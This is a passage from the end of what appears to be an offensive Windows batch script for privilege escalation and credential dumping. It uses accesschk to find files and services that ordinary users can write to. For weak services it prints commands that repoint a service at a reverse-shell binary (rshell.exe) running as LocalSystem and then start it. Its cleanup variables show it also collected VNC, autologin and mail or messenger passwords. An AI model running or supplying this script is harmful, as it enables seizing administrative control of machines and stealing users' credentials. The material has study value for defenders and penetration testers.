  580.     accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
  581.     accesschk.exe -uwqs "Authenticated Users" c:\*.*  | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*.
  582.    
  583.     echo.Searching for weak service permissions
  584.     echo.--------------------------------------
  585.     accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL
  586.     if %ERRORLEVEL% == 0 (
  587.         echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! ****
  588.         accesschk.exe -uwcqv "Authenticated Users" *
  589.         echo.****************************************************************
  590.         echo.
  591.     )
  592.     accesschk.exe /accepteula 1>2>NUL
  593.     accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL
  594.     if %ERRORLEVEL% == 0 (
  595.         echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! ****
  596.         accesschk.exe -uwcqv "Users" *
  597.         echo.*******************************************************
  598.         echo.To plant binary in service use:
  599.         echo.sc config [service_name] binpath= "C:\rshell.exe"
  600.         echo.sc config [service_name] obj= ".\LocalSystem" password= ""
  601.         echo.sc qc [service_name] (to verify!)
  602.         echo.net start [service_name]
  603.         echo.*******************************************************
  604.     )
  605.     accesschk.exe /accepteula 1>2>NUL
  606.     accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL
  607.     if %ERRORLEVEL% == 0 (
  608.         echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! ****
  609.         accesschk.exe -uwcqv "Everyone" *
  610.         echo.*******************************************************
  611.         echo.To plant binary in service use:
  612.         echo.sc config [service_name] binpath= "C:\rshell.exe"
  613.         echo.sc config [service_name] obj= ".\LocalSystem" password= ""
  614.         echo.sc qc [service_name] (to verify!)
  615.         echo.net start [service_name]
  616.         echo.*******************************************************
  617. goto:eof
  618.  
  619. :cleanup
  620. set jollykatz=
  621. set accesschk=
  622. set OSbit=
  623. set whoami=
  624. set runningelevatedprompt=
  625. set netshfirewall=
  626. set OSVersion=
  627. set alwaysinstallelevated=
  628. set realvncpassfound=
  629. set tightvncpassfound1=
  630. set tightvncpassfound2=
  631. set tigervncpassfound=
  632. set vnc3passfound1=
  633. set vnc3passfound2=
  634. set vnc3passfound3=
  635. set winautologinpassfound=
  636. set winautologindomainfound=
  637. set winautologinuserfound=
  638. set defaultloginpass=
  639. set IE6found=
  640. set IE7found=
  641. set AIM6found=
  642. set AIMPROfound=
  643. set BEYLUXEfound=
  644. set BIGANTfound=
  645. set CAMFROGfound=
  646. set GOOGLETALKfound=
  647. set IMVUfound=
  648. set NIMBUZZfound=
  649. set PALTALKfound=
  650. set YAHOOPAGERfound=
  651. set INCREDIMAILfound=
  652. set OUTLOOK2013found=
  653. set OUTLOOK2010POSTNTfound=
  654. set OUTLOOK2010PRENTfound=
  655. set OUTLOOK98MAILONLYfound=
  656. set OUTLOOK98NORMALfound=
  657. goto:eof
  658.  
  659. :end
  660. echo.
  661. echo.==============
  662. echo.Dump complete!
  663. echo.==============
  664. GOTO:eof